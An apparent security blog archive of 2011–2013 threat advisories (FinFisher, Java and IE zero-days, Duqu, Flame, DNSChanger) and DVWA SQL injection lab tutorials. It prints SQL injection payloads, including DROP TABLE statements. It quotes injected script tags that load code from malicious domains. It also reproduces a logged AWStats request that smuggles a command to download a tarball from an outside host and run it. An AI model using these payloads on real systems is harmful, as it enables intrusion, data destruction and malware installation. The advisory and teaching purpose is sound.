Cyberattacks May 2013 – Malware on PRU 13 General Elections (Ubah!!)
As Malaysian are excited on the voting days which held at least once every five years. A new Malware has been discovered FinFisher (also called FinSpy). FinSpy is a commercially sold spyware package.
Canada based interdisciplinary laboratory had discovered a sample of FinFisher (a.k.a. FinSpy) surveillance in a Microsoft Word document crafted specifically for Malaysia’s 2013 general elections.
The specifically crafted Malware with the capability of:
- hijack the camera and microphone.
- infiltrates computers to grab screenshots.
- record chat conversations.
- log keystrokes.
Internet-based sources revealed this attack is targeting on Microsoft Word 2003. It will run VB-Macro and a fake FireFox 14.0 which named as “WINWORD.exe” will be created. The victim’s computer will communicate with the FinFisher Command & Control servers as follow:
168[.]144[.]97[.]39
117[.]121[.]241[.]86
Advisories:
- Block the IP(s) 168.144.97.39 and 117.121.241.86
- Be wary before clicking on links or opening files received from known/unknown sources.
May refer to Macro Security Levels in Office 2003 Macro Security Level
Full details by F-Secure: F-Secure Analysis
Cyberattacks January 2013 [Part II] – Zero-Day Java Exploit Debuts in Crimeware
New Java zero-day that exploits a vulnerability (CVE-2013-0422) in fully-patched versions of Java 7.
This zero-day vulnerability affects the latest version, Java 7 Update 10.This vulnerability is already included in most of the Crimeware Kits which included:
- Blackhole
- Nuclear Pack
- Cool Exploit Kit
- Redkit
while Metasploit is expected to release an module soon. The zero-day will be exploited in various attack vectors.
Advisories:
- Disable Java if it is not required.
- If there is critical application/websites requires Java. It is Suggested to use different web browser to access them such as:
- Disable Java Plug-in on Web Browser intended for normal web surfing.
- Enable Java Plug-in on another Web Browser for opening websites which require Java.
- For Example: Use Firefox (Java Plug-in DISABLED) for normal web surfing and Internet Explorer (Java Plug-in ENABLED) for websites which requires Java.
- Always wary of clicking on links received from known/unknown sources. An attacker would have to convince the user to exploit this vulnerability, typically by getting them to click on malicious URL through email, instant messenger message, social network and many more…
You may also refer to the in-depth security news provide by KrebsonSecurity:
LAB Testing with DVWA – Part I [SQL Injection Exploitation]
In order to exploit SQL injection vulnerabilities, understanding how query is built is essentials in order to inject our parameter in a situation that the query will remain true.For exampled SQL Injection Tutorials,a text field where it asks for user ID. By entering number 1 and click on the submit button the result will return the first name and the surname of the user with ID=1.
Executed query in the database as below:
[SELECT First_Name,Last_Name FROM users WHERE ID=’1′;]
In order to find the first names and surnames of all the users, lets try to change the ID number on the URL [127.0.0.1/dvwa/vulnerabilities/sqli/?id =(1,2,3,4) &Submit=Submit#] or the Submit Column to other values.
The next testing is to identify what kind of database is running on the back-end in order to construct the queries accordingly and to extract the information.
The idea is to make the database to respond in a way that it will produce an error message that it will contain the database type and version.[single quote] such as [‘] will force the database to consider any characters that are following the quote as a string to cause a syntax error.The vulnerable parameter id=’ will cause the database to generate an error message as shown in the browser. However, it fails to show it’s version number. Let’s proceed with version findings:
UNION statement being used for the identification [union select 1,@@version#]
Running on MySQL Ver: 5.5.27
Beside, we also able to perform hostname discovery with @@hostname statement:
Hostname Discovery via SQL Injection ‘ union select null,@@hostname #
Above Scenario and testing is part of the ideal how SQL Injection is able to discover information and abuse on server with such vulnerabilities, beside a simply statement and version or host discovery, never forget about the in depth damage that possibly can be done. Enjoy the tutorial and sample while always be ethical. 🙂
LAB Testing with DVWA – [SQL Injection Statements]
SQL injection is a code injection technique that exploits a security vulnerability in a website’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
- Incorrectly filtered escape characters
User input is not filtered for escape characters and is then passed into an SQL statement. Potential manipulation of statements performed on the database by the end-user of the application. Line of code illustrates this vulnerability:
statement = “SELECT * FROM users WHERE name = ‘” + userName + “‘;”
This SQL code is designed to pull up the records of the specified username from its table of users. However, if the “userName” variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the “userName” variable as:
‘ or ‘1’=’1
‘ or ‘1’=’1′ — ‘
‘ or ‘1’=’1′ ({ ‘
‘ or ‘1’=’1′ /*
SELECT * FROM users WHERE name = ” OR ‘1’=’1′;
SELECT * FROM users WHERE name = ” OR ‘1’=’1′ — ‘;
The following value of “userName” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “userinfo” table using an API that allows multiple statements:
a’;DROP TABLE users; SELECT * FROM userinfo WHERE ‘t’ = ‘t
This input renders the final SQL statement as follows and specified:
SELECT * FROM users WHERE name = ‘a’;DROP TABLE users; SELECT * FROM userinfo WHERE ‘t’ = ‘t’;
Most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP’s mysql_query(); function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn’t stop them from modifying queries.
- Incorrect type handling
This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example:
statement := “SELECT * FROM userinfo WHERE id = ” + a_variable + “;”
It is clear from this statement that the author intended a_variable to be a number correlating to the “id” field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to
1;DROP TABLE users
will drop (delete) the “users” table from the database, since the SQL would be rendered as follows:
SELECT * FROM userinfo WHERE id=1;DROP TABLE users;
LAB Testing with DVWA – [Installation]
DVWA is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment. Beside it’s also provide a better understanding for web developers in securing web applications and a web application learning environments for newbies.
WARNING!! – from DVWA: User are not suppose and not encourage to upload it to your hosting provider’s public html folder or any working web server as it will be hacked!!
Step 1: [Installation] Guide from DVWA:
http://www.youtube.com/watch?v=GzIj07jt8rM
Default username = admin
Default password = password
- Installation of DVWA can be done by installing ‘XAMPP’ if you do not have a web server setup.
- XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin.
- XAMPP can be downloaded from: http://www.apachefriends.org/en/xampp.html
- Simply unzip dvwa.zip, place the unzipped files in your public html folder, then point your browser to http://127.0.0.1/dvwa/index.php
Step 2: [Setup Database]
Click on the Setup button in the main menu, then click on the ‘Create / Reset Database’ button. This will create / reset the database for you with some data in.
‘After installation, DVWA is successful hosted and running on My SQL backend Database’
Any error while trying to create your database, make sure your database credentials are correct within /config/config.inc.php
Cyberattacks January 2013 [Part I] – Fraudulent Digital Certificates Could Allow Spoofing
Fake Turkish digital Certificates blocked by Browser vendors – The Hacker News present
A fraudulent digital certificate that could be used for active phishing attacks against Google’s web properties. Using the certificate it is possible to spoof content in a classic phishing schema or perform a man-in-the-middle attack according Google Chrome Security Team and Microsoft experts.Microsoft has been immediately started the procedure to update its Certificate Trust list (CTL) and all versions of its OSs to revoke the certificate. Microsoft has also decided to revoke other two certificates for the same reason, it seems that some attacks using the first certificate have been already detected, fraudulent digital certificate that was mistakenly issued by a domain registrar run by a Turkish domain registrar.
Microsoft is aware of active attacks using one fraudulent digital certificate issued by TURKTRUST Inc., which is a CA present in the Trusted Root Certification Authorities Store. This fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. This issue affects all supported releases of Microsoft Windows.
TURKTRUST Inc. incorrectly created two subsidiary CAs (*.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org). The *.EGO.GOV.TR subsidiary CA was then used to issue a fraudulent digital certificate to *.google.com. This fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against several Google web properties. To help protect customers from the fraudulent use of this digital certificate, Microsoft is updating the Certificate Trust list (CTL) and is providing an update for all supported releases of Microsoft Windows that removes the trust of certificates that are causing this issue.” It’s still unknown which is the real target of attack neither their geographic distribution, Microsoft advisory refers the domain kktcmerkezbankasi.org a web site that present itself as the Central Bank of the Turkish Republic of Northern Cyprus (TRNC).
Google On-Line Security Blog published a blog post that reported that on Dec. 24, 2012, its Chrome Web browser detected and blocked an unauthorized digital certificate for the “*.google.com” domain. The security repercussions are very critical, any attacker with the possibility to sign using a certificate of a CA can sign certificates for any domain.
Advisories:
“Microsoft Security Advisory (2798897) -Fraudulent Digital Certificates Could Allow Spoofing”
Cyberattacks December 2012 – New Internet Explorer Zero-Day
IE Zero Days in the wild: This vulnerability had been tracked under CVE-2012-4792
The zero-day was first disclosed by a US based network security company on December 28, 2012 during an investigation on Council on Foreign Relations (CFR)’s website compromise. In the security advisory released on December 29, Microsoft had confirmed that Internet Explorer 6, 7 and 8 are vulnerable to this zero-day attack. The company expects to issue a fix within the next few days.
Internet-based sources revealed this attack is targeting on Internet Explorer which configured for English (U.S.), Chinese (China), Chinese (Taiwan), Japanese, Korean, or Russian. Moreover, it will only target on Internet Explorer with Adobe Flash installed. In this attack, Adobe Flash is used to generate a heap spray attack against Internet Explorer. The consequence of this attack is allowing arbitrary code execution under the context of the user.
Zero Days Exploits Explanation with Graph by Trend Micro
How do attackers exploit this vulnerability?
Attackers make use of several components in order to successfully exploit IE. These include a malicious HTML file, a malicious .SWF file, and triggering a malicious .EXE as a final payload. When users connect to a compromised website, the malicious HTML file or exploit.html (HTML_EXPDROP.II) serves as the entry point of the attack. It creates multiple instances of the image element (array) in the document, or the current Web page. All of these set the value of src to string “a”. These values are stored in the heap memory. A heap refers to an area of pre-reserved memory that a program can use to store data in some variable amount.
What are other repercussions of unpatched systems?
Exploits generally allow attackers to drop or load malware that downloads other, more menacing malware onto vulnerable or unpatched systems. But even an up-to-date computer can be vulnerable to attacks through zero-day vulnerabilities. Zero-day exploits are more dangerous in nature as they target vulnerabilities that have yet to be resolved by the respective software vendors. Until the software vendor issues a workaround solution, i.e., a fix tool or the actual software update, users are left unprotected and vulnerable to threats.
Advisories:
- Upgrade your Internet Explorer to version 9 or later. Microsoft confirmed that Internet Explorer 9 and 10 are not affected.
- If you have no choice but to use Internet Explorer version 8 or lower, you can block the attack by: Disabling Javascript and Flash
- Install The Enhanced Mitigation Experience Toolkit (EMET) and enable it to protect Internet Explorer. http://support.microsoft.com/kb/2458544
- Be wary before clicking on links received from known/unknown sources. An attacker would have to convince the user to exploit this vulnerability, typically by getting them to click on malicious URL through email, instant messenger message, social network, etc.
Cyberattacks November 2012 Part II – Spoofed DNS Service Attack
Spoofed DNS traffic is an observation traffic from Black Lotus Communications’s IP with source port 53.This traffic indicates backscatter from an attack on Black Lotus’s customers.In other words, some of the IP addresses are being spoofed by the attacker for DNS reflection attack on TCP port 53 (DNS)
Backscatter is a side-effect of a spoofed denial of service (DoS) attack where the attacker spoofs the source address in IP packets sent to the victim in order for the victim to responds to the spoofed packets where these response packets are known as backscatter. The backscatter response packets from the victim will be sent back to the spoofed destination.
A DDoS mitigation services provider will need to validate the real source of the DNS reflection attack by responding to the spoofed packets.This explained the appearance of IP(s) from Black Lotus Communications with source port 53.
Block Black Lotus Communications IP(s):
- 199.59.160.0 – 199.59.167.255
- 208.64.120.0 – 208.64.127.255
Advisories
Configuring Unicast Reverse Path Forwarding (URPF) on network routers to prevent IP address spoofing.
Cyberattacks November 2012 Part I – #opleak Targets Financial Institutions in Asia
#opleak is an operation originating from the hacker group – xl3gi0n, which had hacked, defaced and leaked databases information of four financial institutions in Asia.
The Hacker Group are targeting
- The Victims: The Asian Banker, Kumari Bank, Midwest Bank and Procredit
- The Targets: Web servers running on Apache with PHP installed with MySQL
- The Method : SQL Injection
- The Tool: Havij – automated SQL injection tool
A good Defenses references from OWASP:
Primary Defenses:
- Option #1: Use of Prepared Statements (Parameterized Queries)
- Option #2: Use of Stored Procedures
- Option #3: Escaping all User Supplied Input
Additional Defenses:
- Also Enforce: Least Privilege
- Also Perform: White List Input Validation
Advisories:
- Ensure web portals sanitize user inputs to ensure data input are as they should be. Limit the use of SQL queries from applications through the use of stored procedures.
- Webmaster can configure their web server to block access traffic from client where the HTTP User Agent header contains ‘Havij’, although this may be changed.
- Ensure the systems are using an up to date version of the software and have had all vendor supplied patches applied, especially for the systems which are running Apache, PHP and MySQL.
More details from OWASP SQL Injection Cheat Sheat
Cyberattacks October 2012 Part (II) – A very Social Malware (Facebook??)
Despite Facebook being not a new attack vector, there is a new kind of malware spreading through Facebook. This malware is protected against both debugging and network traffic analysis. In order to protect binary code from reverse engineering, it was obfuscated using a special Protector. Network traffic is encrypted (even the DNS queries!) and produced in excess. VirusTotal results for this malware sample:
It spreads through Facebook, by writing a chat short chat message and posting following message on a wall:
http://xxxxxxxx.com/xxxxxxxx.php?ref=facebook&w=%5Brandom characters]&resource=youtube&w=[name] :* favourite [random characters] 😀
Then, it sends a following Skype message:
youtube favourite [random characters]! http://xxxxxxxx.com/xxxxxxxx.php?ref=facebook&w=%5Brandom characters]&resource=youtube&w=[name]
Finally, it sends an MSN message
:* http://xxxxxxxx.net/xxxxxxxx.php?ref=facebook&w=%5Brandom characters]&resource=youtube&w=[name] youtube hit [random characters] 😀
If user clicks on the link, malware is downloaded to the victim’s computer.
Kindly refer to the following link for details analysis and further explanation: (Analysis of a very social malware):
Cyberattacks October 2012 Part (I) – Skype Viruses
You may be surprised that Skype could compromise your computer security. The more you know about these threats, the better prepared you will be.They are malware, so you should avoid them with just as much caution.
As soon as the worm has infected a system it tries to automatically spread itself by sending out a message to all the Skype contacts of the affected user. The message currently says:
“hey is this your skype profile pic?”
Then a link to the picture in question follows and at the end of each link the Skype nickname of the targeted user is included:
“http://xxxxxxxxxx.xxx/xxxxxx?image=%5BSkype nickname of target]” (Link removed)
Please be very careful when opening links that were sent to you by your friends and acquaintances.
If this warning didn’t reach you in time and your system has already been infected, you can join the discussions in the following thread in order to figure out how to get rid of the worm in its current version:
http://www.pokerstrategy.com/forum/thread.php?threadid=210062
Since a couple of days, CERT Polska has also been taking an active role in disabling the Dorknet worm. A Polish security portal Niebezpiecznik.pl (article in Polish) mentioned that it also targets Polish users. We acquired a sample of this malware (called “Dorkbot”). This dropper was detected by 28 out of 44 antivirus used by the VirusTotal service:
Darkbot has a very wide range of spreading capabilities and has several different malicious behaviors. As is stated in other news reports, it is most widely present on Skype.
How can you protect yourself?
Firstly, please do not click on any links that seem suspicious to you. Remember that even your friends can be infected and become a part of a botnet. You also should have an updated antivirus software and operating system.
Samples malicious was named
- skype_08102012_image.exe.
- unpacked Dorkbot (unpacked.exe)
- (downloaded.exe) downloaded by Dorkbot.
Cyberattacks September 2012 – IE Zero-Day Exploited in the Wild
A new zero-day vulnerability affecting Internet Explorer is being exploited in the wild affecting IE 9 and earlier. The vulnerability, if exploited, would allow full remote code execution and enable an attacker to take over an affected system. Security researcher Eric Romang discovered the vulnerability and exploit over the weekend while monitoring some infected servers said to be used by the alleged Nitro gang. To run the attack, a file named ‘exploit.html’ is the entry point of the attack … According to analysis by VUPEN, the exploit takes advantage of a ‘use-after-free vulnerability’ that affects the mshtml.dll component of Internet Explorer. Rapid7 on Monday released an exploit module for Metaspolit which will let security teams and attackers alike test systems.
This new vulnerability exploitation consists of a few malicious files which include exploit[dot]html, Moh2010[dot]swf, Protect[dot]html and 111[dot]exe.
Each of the files plays its own role:
- exploit[dot]html – Loads the flash file Moh2010[dot]swf as an initial vector for exploitation.
- Moh2010[dot]swf – Facilitates arbitrary code execution (heap spray), loads Protect[dot]html, encrypted using DoSWF
- Protect[dot]html – Checks for IE version and Windows OS and execute the malicious payload – 111[dot]exe if the criteria are matched.
The payload executed is poison Ivy RAT. It is a dropper similar to the one found in the Java Zero-Day exploit .
Eric Romang, co-founder of ZATAZ.com had tested the exploits and it seems to work on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Alien Vault Labs further verified this via its blog where it mentioned that this zero-day appears to affect Internet Explorer 7 and 8 and seems to be exploitable at least on Windows XP. Furthermore, Metasploit had integrated this exploit into its framework, and it had demonstrated a successful attack against a Windows 7 machine with Internet Explorer 9 installed.
So far, the C&C servers involved are ie[dot]aq1[dot]co[dot]uk and hello[dot]icon[dot]pk which are resolving to a same IP address 12.163.32.15 located in USA.
Advisories:
Stop using Internet Explorer 7, 8 and 9 until Microsoft releases a new patch
Block 12.163.32.15 – ie[dot]aq1[dot]co[dot]uk and hello[dot]icon[dot]pk.
Cyberattacks August 2012 – Java Zero-Day Exploited in the Wild
This new vulnerability exploitation consists of two phases. The first phase will download a malicious Java applet from ok[.]aa24[.]net with IP address 59.120.154.62, which currently resolving to an IP address in Taiwan. Once the first exploitation is successful, it will download and execute a dropper on the infected host. The dropper appears to be poison Ivy RAT variant, which likely to be detected by many antivirus vendors. The dropper will then call to a C&C server, with domain hello[.]icon[.]pk. Currently, this domain is resolving to an IP address 223.25.233.244 located in Singapore.
Sources from Internet indicated that the exploitation seems to work on Internet Explorer, Firefox and Google Chrome, and it affects Java 7 (1.7) Update 0 to 6. Metasploit later integrated this exploit into its framework, and it was told that the attack is successful against a fully patched Windows 7 SP1 with Java 7 Update 6. Another additional landing page “62[.]152[.]104[.]149/public/meeting/applet[.]jar” which is serving Java Zero-Day Exploit (CVE-2012-4681).
The landing page ok[.]aa24[.]net looks like a blank page. Sometimes we may see the word “Loading”.
Advisories:
Disable Java plugin from your browser or uninstall it from your computer completely.
*[http://krebsonsecurity[.]com/how-to-unplug-java-from-the-browser/]
Block 59.120.154.62 – ok[.]aa24[.]net and 223.25.233.244 – hello[.]icon[.]pk.
*However attackers are not limited to the current domains and IP addresses.
Cyberattacks July 2012 – DNSChanger Malware(Countdown to July 9th)
DNSChanger is malicious software (malware) that changes the infected computer’s Domain Name System (DNS) server settings to replace the Internet Service Provider’s (ISP) good DNS servers with bad DNS servers operated by the criminal.
Back in November 2011, the FBI had uncovered a network of rogue DNS servers under Operation Ghost Click. Six Estonian nationals have been arrested and charged. The FBI’s investigation showed that the DNSChanger botnets are operated under the company name “Rove Digital” which was based in Estonia. According to a press release by the FBI, DNSChanger will cause the following:
Click Hijacking
When the user of an infected computer clicked on a search result link displayed through a search engine query, the malware cause the computer to be re-routed to a different website. Instead of being brought to the website to which the user asked to go, the user was brought to a website designated by the defendants. For instance, when the user of an infected computer clicked on the domain name link for the official website of Apple-iTunes, the user was instead taken to a website for a business unaffiliated with Apple Inc. that purported to sell Apple software.
Advertising Replacement Fraud
By using the DNS Changer malware and rogue DNS servers, the cyber syndicate replaced legitimate advertisements on websites with substituted advertisements that triggered payments to them. For example, when the user of an infected computer visited the Amazon.com website, a prominent advertisement for Windows Internet Explorer 8 had been fraudulently replaced with an ad for an email marketing business.
Besides, there is a high possibility where an infected computer may also be infected with other malware. This is because in some case, the DNSChanger Malware had the additional effect of preventing users’ anti-virus software and operating systems from updating
How Do I Know if My Computer Is Infected?
You can check to see whether your computer is infected on http://dcwg.org/ by DCWG.
If the page is green, you’re in the clear. If it’s red, your computer is infected.
Cyberattacks June 2012 (III) – TorTorOPS Targets .MY Domains
The attacks waged against .MY domains due to a statement made by Malaysian Information, Communications, and Culture Minister, Dato’ Seri Utama Dr. Rais Yatim last week which saying that Tor-Tor dance and Gordang Sambilan drums would be acknowledged as national heritage and registered under Section 67 of the National Heritage Act 2005.
The TorTorOPS seems to reflect Indoensians’s anger who claimed that Tor-Tor dance is their country’s cultural heritage. It is clearly shown via some of the defacements made:
Cyberattacks June 2012 (II) – Linkedln Member Passwords Compromised
Latest blog update by Vicenta Silveria, Director at Linkedln had confirmed that Linkedln member passwords have been compromised. Linkedln responded that it will suspend members’ account with compromised password. Linkedln said, the members affected will receive an email from Linkedln with instructions on how to reset their passwords. Linkedln emphasized that there will not be any links in this email.
Internet-based sources revealed that a list containing around 6.5 million Linkedln hashed passwords was leaked in a Russian forum last few days. If the number is true, then it involved around 4.33% of the Linkedln members as currently there are over 150 million members, as claimed by Linkedln in their site.
Mikko Hypponen, Chief Research Officer (CRO) at F-Secure had shared a few cracked passwords from the hashed dump which included: nathanlinkedin, linkedintrouble, hondalinkedin, eaglelinkedin springlinkedin, san!francisco!, salasanalinkedin, wwwLinkedIn, B1uesC1ues, T1msux!, M4nu3l.- etc. It showed that the Linkedln members’ password is fairly easy to crack, as the passwords were hashed with SHA-1 algorithm and unsalted. Such approach is very vulnerable to dictionary attack, especially when the user is using a weak password, which most likely will be found in a brute force dictionary attack.
In the mean time, Linkedln also announces that they have enhanced their security, which includes hashing and salting of their current password databases.
Workaround:
Change your Linkedln account password. You can refer the following link:
- http[:]//blog[dot]linkedin[dot]com/2012/06/06/updating-your-password-on-linkedin-and-other-account-security-best-practices/
- Be alert on scam emails about Linkedln password changes, which links to phishing sites. Linkedln had stressed that there will not be any links in the email sent from Linkedln for password changing.
Cyberattacks June 2012 (I) – Flame/Flamer/Skywiper malware
Flame/Flamer/Skywiper malware – one of the most advanced malware found yet!!.. So far, known vulnerabilities used in this malware are: MS10-046 and MS10-061. Those were both used in Stuxnet and Duqu to maintain persistence and move laterally on infected networks.
Flame/Flamer/Skywiper malware has very advanced functionality to steal data and to spread itself once the machine is successfully infected. This malware covers all possible ways to gather information which includes keyboard, screen captures, microphone, storage devices, network including wifi, Bluetooth, USB and even some system processes.
The authors of this malware used SQLite, SSH, SSL and LUA libraries that made the code look less suspicious and more like a business database system.
CrySyS lab reported, this malware may have been active for as long as five to eight years. According to F-Secure, complex malwares or APTs like Stuxnet, Duqu, Flame/Flamer/Skywiper were most likely developed by a western intelligence agency as part of their covert operations which weren’t intended to be discovered.
There are recent reports that Flame/Flamer/Skywiper malware used MiTM (Man in the Middle) attack against windows update. This advanced malware has a additional module which appears to do a MiTM attack on the Microsoft Update or Windows Server Update Services (WSUS) system. Microsoft discovered that some components have been signed by certificates that allow software to appear as if it was product of Microsoft. It is believed that authors of this malware exploited older cryptography algorithm and then used to sign their malicious code as if it originated from Microsoft.
Cyberattacks May 2012 – (OpNewSon) from TheWikiBoat
TheWikiBoat has threatened to launch an Operation NewSon (OpNewSon) on 25th May 2012 (US Time zone) which aim to attack 46 high profile corporate entities (see attached). TheWikiBoat had also plan to release highly classified data from the targets. The objective of this attack is to support Lulz, which is a group actively involved in hacktivism such Sony Pictures user account information leakage and DDoS attack on CIA website back in 2011.
TheWikiBoat is also urging Internet users to help them in this operation by using Low Orbit Ion Cannon (LOIC). LOIC is an open source network stress testing and denial-of-service attack application. It had been utilized by hackers in DDoS attack such as the Operation Megaupload.
Cyberattacks April 2012 – Nikjju Mass SQL Injection Campaign
This attack is targeted on ASP, ASP.net and PHP websites. It was reported that visitors to the infected pages will be redirected to malicious sites hosting fake/rogue AVs.
The infected websites are injected with the following strings:
<script src= http://hgbyju.com/r.php></script>
<script src= http://nikjju.com/r.php></script>
<script src= http://hnjhkm.com/r.php></script>
Research showed that all existing three domains are hosted on IP 31.210.100.242, Turkey although it is expected that see more rogue domains participating in the campaign.
Domains updated Date:
hgbyju.com 17-Apr-12
nikjju.com 1-Apr-12
hnjhkm.com 26-Mar-12
Advisories:
Strongly advised to block access to the suspicious sites (hgbyju.com, nikjju.com and hnjhkm.com) at their proxies to prevent end-users machine to be directed to an infected site.
Cyberattacks February 2012 – Denial of Service Attacks from L0NGwave99
Hackers part of the L0NHwave99 crew continue the campaign dubbed Operation Digital Tornado launched back in February as a form of protest against the US government. This episode, entitled “The Judgementday,” targets the sites of NASDAQ, the New York Stock Exchange (nyse.com), the Miami Stock Exchange (ms4x.com), BATS Exchange and CBOE.
Cyberattacks December 2011 – AWStats Remote Command Execution Vulnerability
AWStats is a free powerful tool that generates advanced web, streaming, ftp or mail server statistics, graphically. This remote command execution vulnerability [CVE-2005-0116] was first reported back in 2005.
From one of the sample IDS logs:
The source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1
Via this specially-crafted HTTP request, the attacker intends to exploit the bug resides in the awstats.pl perl script. The script does not sanitize correctly the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are used in a Perl open() function call. Note here that the bug is only discovered in AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.
Advisories:
Ensure AWStat has been upgraded to the latest version of (6.9 or later)
Any security-related issues on AWStats are available here:
Cyberattacks October 2011 – Malware Duqu
A backdoor named ‘Duqu’. Duqu contains a backdoor that record keystrokes and collect other system information. Symantec reported that attackers behind this Trojan Duqu are searching for information assets that could be useful to launch attacks in future.
Analysis & Impacts:
Duqu is a sophisticated Trojan which seems to be written by same people behind Stuxnet worm since there are similarities in source code between Duqu & Stuxnet. The difference between Duqu and Stuxnet is, Stuxnet was created to sabotage Industrial Control Systems (ICS) whereas Duqu’s main purpose is to act as a backdoor into the system and collect private information. Duqu doesn’t seem to be replicate on its own compared to Stuxnet.
Duqu uses HTTP and HTTPS to communicate to a Command & Control (C&C) server at 206.183.111.97. Duqu hides its traffic by pretending to be like normal web traffic. Duqu sends back a JPG file called ‘dsc00001.jpg’ and includes stolen information encrypted with AES.
Detailed analysis of Duqu’s components are as follows:
- Duqu consists of a driver file(DLL) which contains other embedded files and a configuration file.
- These files needs to be installed by another executable.
- The installer lists the driver file as a service so it starts at system power-on.
- The driver then injects the main DLL into service.exe. From here, the main DLL begins extracting other embedded components and these components are injected into other processes.
- One of the variant’s driver files was signed with a valid digital certificate which was set to expire on August 2, 2012. The certificate belonged to a company in Taipei, Taiwan. Which was revoked since October 14, 2011.
- Duqu will automatically remove itself from the system after 36 days. However, there are possibility of additional downloaded components that will extend the number of days.
Advisories:
- Ensure Antivirus software is updated since some of the Antivirus vendors can detect this malware and immediately block them.
- It is also advisable to educate users to take extra caution while opening any emails and verify their authenticity before clicking on any link which will redirect to certain websites or downloading attachments.
Cyberattacks September (II) 2011 – Hackers break SSL encryption used by millions of sites
Researchers have discovered a serious weakness in virtually all websites protected by the secure sockets layer protocol that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser.
Reported that SSL encryption used by millions of sites had been broken. The vulnerability resides in versions 1.0 and earlier of TLS, or transport layer security, the successor to the secure sockets layer technology that serves as the internet’s foundation of trust. Although versions 1.1 and 1.2 of TLS aren’t susceptible, they remain almost entirely unsupported in browsers and websites.
Analysis & Impacts:
All SSL Web sites that make use of version 1.0 or earlier version of TLS will be vulnerable to eavesdropping by hackers who are able to control the connection between the end user and the website he’s visiting.
More information on this newly discovered SSL vulnerability can be found in these links:
- http://www.sott.net/articles/show/235173-Hackers-break-SSL-encryption-used-by-millions-of-sites
- http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
Cyberattacks September(I) 2011 -DNS Distributed Denial Of Service Attacks
Observing an increase in volume of DNS Distributed Denial of Service attacks targeting DNS servers. This attack traffic will be from source port 53 towards destination port 53. The attack may consist of DNS Zone transfers, DNS recursive queries or DNS cache poisoning attempts.
Analysis & Impacts:
DNS Zone Transfers: Zone Transfer which also known as AXFR (Asynchronous Full Transfer Zone) or IXFR (Incremental Zone Transfer) is a mechanism used by administrators to replicate DNS databases across a set of DNS servers. A Zone Transfer request to a DNS server returns a complete list of hostnames and IP addresses in the domain. Ordinarily, zone transfers should only occur between authoritative DNS servers for a domain. Attackers may query DNS servers to compile a list of possible hosts to attack. Zone Transfers are usually carried out using TCP Port 53 whereas normal DNS query operations are carried out using UDP Port 53. Also, a large number of such requests from multiple compromised hosts towards a single DNS server may cause the server to overload.
DNS Recursive Queries: A recursive query is one where the DNS server will fully answer the query (or give an error). If DNS Server is configured to provide recursion, performance of server and network both will be negatively affected when processing spoofed DNS requests. The amplification effect in a recursive DNS attack is based on the fact that small queries can generate larger UDP packets in response which can be used to cause Denial of Service.
DNS Cache Poisoning: DNS Cache poisoning allows an attacker to change a DNS entry so it points to an IP address of attacker’s choice. If the server accepts the fake record, the cache is poisoned and subsequent requests for the specific address of the domain are pointed to the IP address controlled by the attacker.
Advisories:
- In order to secure the DNS servers from the DDOS, the following measures can be adopted:
- Ensure that the DNS servers are clustered
- Ensure that the DNS server is placed behind a firewall
- It is advisable to use the firewall to perform the DNS queries; this reduces the organizational DNS risk
- Scan the DNS machine and make sure that no other ports are listening apart from the typical DNS ports
- Remove all the other services from the DNS servers
- Restrict recursion and disable the ability to send additional delegation information; this reduces the risk of DNS based DoS and cache poisoning attacks.
- Check with the ISP on possible ways to mitigate the downstream traffic at their end in case of high volume of DNS traffic.
sharing by "desheep" 